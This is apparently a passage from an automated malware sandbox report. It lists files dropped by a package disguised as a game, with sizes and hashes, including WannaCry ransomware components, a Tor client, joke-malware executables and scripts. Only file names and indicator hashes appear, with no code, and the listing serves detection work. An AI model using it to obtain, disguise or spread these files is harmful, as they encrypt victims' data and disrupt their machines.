                                                                                                                                                                                                                                      c36c07cebd367692686d0572355f11923fe6a5e9d9abb988d8ed25ac8262a9b8

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      3c5b78a4f7baaf28f486266cc85c988023dc2becbffa6d9fa0963e862040e48e5ad7e1eeb3ff8b48db73a17085ca1deb3c1658723c0176843c9f4e6f1f400b64

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Adobe_Flash_Player.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      114B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      d725d85cc5f30c0f695b03a9e7d0c4c0

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      131b68adcddb7ff3b3ce9c34c5277eb5d673f610

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      4d4588c42fa8df0ea45ad48aca4511bb4286f0deaa41fdf188c3b7ab9e1b698a

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      01f270a15aa10e60e14ac140ccb54e38cf8e57833ef1c0db7d36688a93ecdc0a59ecf9ead9366a5920faac7e28a2e0ee03759eb0fa92d455abc72f406fe8775b

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CabF54A.tmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      70KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      1723be06719828dda65ad804298d0431f6aff976

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\TarF549.tmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      181KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      4ea6026cf93ec6338144661bf1202cd1

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6.2MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      ddf14812a807f2b9748b353bdd5b1f37

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      28401e0c20c811ce69f0d6c659aeaa5cf14cbdac

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      ef7a8c9db2947d9660d58294398185c94a5e77420d6d8da109f05085fb067909

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      cb30dfb687194689baa91a2f15ad6d8deb841ae14c50cadd55603ca72c0fdf9940c2c227c447b25b40b6d87a814183d8a959d8dfa4f24b9cafdddf93033996ba

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\323671721043228.bat
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      412B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      0bf5336537f063645b91622c0a92e33a

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      2c63901ee69e76310188a8be3314fc1354dd1840

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      77857ba8803dbc17865255a7fa595a902db35b85e4933faa35499de33b6cb6e6

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      ce0cd1e72ae81418d88512165f913f26024b6d0e7cfcae50bf818b8144210d1fbafb42ccf8de5a86f3d71fd93bc78a09ea4e8d134e3d8766dafbe1eb4019130c

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\@[email protected]
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      933B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      7e6b6da7c61fcb66f3f30166871def5b

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      00f699cf9bbc0308f6e101283eca15a7c566d4f9

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\FloweyTransparent.png
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      141KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      0ec81a06032a4af610a1115b78f0b538

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      9ff2a355bb20e7fd64720b1442019025737c6314

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      9912414319474c62a7d906b5c5f41627d0d8a0c84c2d4ec198bef720fa62bb8f

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      a6374105aa1edafe32c90d830e989cd16dddb98190234c4a936148b76cfc11038415d33477eaac821f2ef23c9f36539b9b6e38ac7573bf016f382fd611b59e8d

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\IMPORTANT.txt
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      273B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      c538506cae8330844fd21a05f2d065aa

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      02534de70d8ac6b5b700456a6f90b8f3b72b3cc0

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      20cd2cf85675a5cfdcba4d355df959d71a9e1944888a7ecea7e3f7a16e8adbf9

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      a2d8070c569d4e4091adc85d570603b0400aedac3da2fd3e18ee588d72b12f1183d27f205ada0fb74e004e89415274fa27e84574f498e2315132c91495fae123

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\Interop.ShockwaveFlashObjects.dll
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      21KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      e869d1d4545c212d9068a090a370ded3

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      a6a92f108bba390cd14e7103ba710efec1d270f9

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      63af704211a03f6ff6530ebfca095b6c97636ab66e5a6de80d167b19c3c30c66

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      ee108b0ebefb476c5beb568129da7ce058229fb42ad3500c6fc37a36d718eb67a17b331d73f6920a5290c3977be2eda96aa057533c3344898d161cb464c6ef76

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\TaskData\Tor\taskhsvc.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      3.0MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      fe7eb54691ad6e6af77f8a9a0b6de26d

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      53912d33bec3375153b7e4e68b78d66dab62671a

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\YFGA.bat
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      643e1d4c3154c5dfe77e8c1f57e852a9

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      719edadfa7323f4ed46f3a134485a4055017a040

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      5675fb3256470cec0a9b5e1ca63aac7331803e3a31c2cc6d8d62a17687335378

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      71ef9cf544459baa80e4a396ce7bcfabb8a6dc23076c861cca35180b9235590f29239eb964a4c374a99870c6f99db6aea946713332558a41c2903e4072ef66c6

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\YouAreAnIdiot.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      424KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      e263c5b306480143855655233f76dc5a

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      e7dcd6c23c72209ee5aa0890372de1ce52045815

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      1f69810b8fe71e30a8738278adf09dd982f7de0ab9891d296ce7ea61b3fa4f69

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      e95981eae02d0a8bf44493c64cca8b7e50023332e91d75164735a1d0e38138f358100c93633ff3a0652e1c12a5155cba77d81e01027422d7d5f71000eafb4113

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      50B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      3167d161336cbd296dc579d2295b0f22

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      53253e5841e6a7a7a1b8bd08378af0a96b2f9a98

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      307879bf0d9bec07bab240b5010434801fbee520c99c5a617e8ac630f42dde80

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      62af8fa0c9a30ec6aa9b552fcac1879af1f00f5ceb48a77718b2a8e042e3524e2cd299f26fcde31ad8abf2dcb94d15cf45ecbce0bd5f9f93f44aca6327aa53ea

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      44B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      9a2ccbd3e2f1a2382fed7674c28dd086

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      b466bdd2079575c938de65285f02739143ecb170

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      4519cd5997afce27129ef943f121972f7b0b34aa018e4dd408892fc5c39bb59e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      8929493211c17a8e99b908a8305dbebe2d96e1b54426e89ddba84c2010a86d7f6d0983080f29fa1ab7a0687d536c0546278b9fffe4560d84e4012f243f344d78

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy3.vbs
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      56B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      19cf22e8d63e787913b6617542211e19

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      8c3d2f43025e5c4ef70e0c4d1f36692361f51b1f

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      dbec312d736f8a56f94ace99986d95d4355ef644a2fd908da1ff4c8b0a003979

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      8b9d192dd7f175e63aebcdfc8426876fa8bf3ae00d3cf10bb8fcf0d0c262b906de28784f5b97141f656e87bb548d343b8d5a127c06ecb407289e91f3fc199608

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\b.wnry
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.4MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      c17170262312f3be7027bc2ca825bf0c

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\bloatware\OperaSetup.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      2d183522f195d563fe2a732363b8f757

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      8b4ba6716e8e635b2b35ee64134784c788fa1b0e

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      4b6d2615f53454076b996a91473287e5fc882ce266933cfbe815a63477ed8407

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      2c37e38214ed90d21345a8675424cfe3086cce34acd19972081479946c541b747b97cc722910189f9b5e7e8bcd56de0b2326407b3008de6763c40366ceffc67b

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\bloatware\bewidgets.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      843KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      ff508ab78289efa35e67a05d6cc20717

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      174f616661b53371fe93fa5cc4ec4b6e233abb43

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      eca41ee73faaa7e85ecf4d4c6d4df0e078c36c6554f25142b5e68b2b6cf68272

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      f94fd558e34589c8b0f3da7d20bbb404c4dc6e560aabc5f7e702cdf6a6b8a7870d63d8fb667f6324461ed37c32f6ff8abb0cee65317c6ad745e61c1fc7c80811

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\bloatware\bloatware.cmd
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      140B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      85960c66edf9a8db4e5a17d9f15b6ae3

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      fb27f19a4e8f55dc2c77d7570d472e8df801531b

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      81a20f21135c05252a3dd2042ff39bf044624c79f6d9ec9fd412a8c9b38d83a3

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      c8b81cb4901039c5ac26bbf2e98b40db60bfd6ab37d7abbc030d1ba11f78485a148935539c09c2cb5c983f14d66b0fdd9d49c138a1340690b2aa69de35d4975f

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\bloatware\fontcreator.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      25.2MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      14cebb6187a53864094293d616e9af4d

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      47b89d897f432002520fb4a9c0c862df45257d36

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      1e3cf9b81993ca63c3da99c4ec29d8826d5ac65be4088b4e4fd52f11224be96c

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      f4bc7cb3f602ac686485ee5b23a856b49ce3e3b73325cc520a728a723d014785f2091905f676312ee7826740f184b074458a31018d3c7d27a6ce2a219643195a

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\bloatware\iconchanger.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      3b89914c7bfe5487af38f7bd8dc31bb5

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      7204cce974e02495f58731e961e4cdc49a2f1ef3

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      14068d0948dfeedc5908573fcaa2704536faa8b0fbea8caac61b9fb264cc204d

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      73735b965a0c948a4126bad31ea54fb4aa31b2c8877ab772f7596a27e821be9f6bba17ddbb9f4e87c6c70bba93375277008e4fa354bf1504e1cd2b9b190d45f8

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\bloatware\pixelsee.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      39490d6ae5b10a8cdffecd71d05141dd

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      450da6260c6817aca8d9444831a48439ba45785c

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      a9427d47bf1cfadd009990ca09feb2af88823f5908b17e2afa70c8c49c95b3eb

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      7ffb9cb6a53cf233b6ff396eeb6193e683aed75001b3f73a1bbadaeec3ff7dcbce9b7e215d1743a4374e488185b824b90dde4afe93a8d93608b6340af07c14fb

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\bloatware\qtranslate.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      908KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      e23ffecb44c814aaa4708d56ab5b144b

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      202311d615685e7baaa41dc149b5a76a69c05a0e

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      d395af3c10e18c944cf8ade76a650623dc23e050eaf652ff31056c84077a013c

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      4ae915fb4cb00e30a215ddd439c6e254fb49ce15c4d53000fb12a0cbf5f68820bc7dca6b840a620351060101c6995fd9429ea91f9682503f01ec001f213cfdc3

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\c.wnry
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      780B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      93f33b83f1f263e2419006d6026e7bc1

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      1a4b36c56430a56af2e0ecabd754bf00067ce488

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\china.png
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      68KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      732dabce85a07f8c14199ab45ff7a438

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      576d530078f6aeaf824748e7c9948930760646c4

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      db58369e888f471c8ac8ec1580ac96003788b7bf249ab02fae6d5160a2affdc3

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      f6963ac6f6c586ec76c00068de3145dd351f7e5b52b6733a00a46327c43a1ec34b6daa7a93cf2315cfb4a6048877bbcdc12c77b694d60f7196d75dd5ddf54e2d

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\flasher.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      246KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      9254ca1da9ff8ad492ca5fa06ca181c6

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      70fa62e6232eae52467d29cf1c1dacb8a7aeab90

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\flowey.jpg
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      6KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      901e58fabfe9d70b980d1ce616dbd442

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      b40e3d61537b9599731e55f5c529d31474794372

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      4adb074b763ae378b34a673226fc26191c0793b56295877aba5f625eaf6cc0fb

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      e096c5e6adea8ba5941e1cc128413ffec47ca615fe9f2346afe45aaf8e14cac585b491153ea5b30b1f876c20ac5d087308a06083f437af3b5cbb815362f6dc9b

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\hydra.cmd
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      47B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      5e578014c7017a85ca32f0b7e5d7df7f

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      c88d8e7179fcc070d4419be9f4d8647354c2f6ed

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      a964a717e3c47cb7d274e98928ca1271377d0d76a8908448e1b70e63af4082ad

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      7eb206b0cbc2a9b744246d8a83b2fccc70204c6e777b0fcbb838e63d477fe047d8827f3c0de823d55b9ab5cba2ab572ff3f543f76a3451fa81b31584cc767106

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\jokewarehydra.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      43KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      b2eca909a91e1946457a0b36eaf90930

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      3200c4e4d0d4ece2b2aadb6939be59b91954bcfa

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      0b6c0af51cde971b3e5f8aa204f8205418ab8c180b79a5ac1c11a6e0676f0f7c

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      607d20e4a46932c7f4d9609ef9451e2303cd79e7c4778fe03f444e7dc800d6de7537fd2648c7c476b9f098588dc447e8c39d8b21cd528d002dfa513a19c6ebbf

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\msg\m_finnish.wnry
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      37KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      35c2f97eea8819b1caebd23fee732d8f

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\reg.reg
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      25KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      aebe09cd7095ec201dc8acc350443242

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      df7337e051bd02e1fdd4005b63ed45b8ca3d9726

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      405d47dca73a5d6180db42e90c35931047c666ed1f1d6fab5ead6110c2356cc7

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      ffc658faf04fee47c1284d439a4c5b3931d2f9bcac9b40e36f59ad0ed4917f0252e639284f817ca84a6da57552f8e0fdf96936987c3f5cf689a537e42b47288d

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\spam.bat
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      158B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      4af4ab45205580fecf659dd857522f6b

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      78ec5ff7647ca56d8c8d72b4da551efa86e53675

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      b997f3a0d79493418f3e9da03dd95aea6b45b8a8c454e8e7d1f06de3ad3e1111

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      f77c7b4d034def85c363805fe625aefb4e461770418f9015d4d5241fb8d09707b9918d54e9b2cc35d06008097174cdda0bee9702466fe7e097014794fe4d77cb

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\wannacryptor.exe
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      3.4MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      84c82835a5d21bbcf75a61706d8ab549

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\wtf.PNG
                                                                                                                                                                                                                                      Filesize

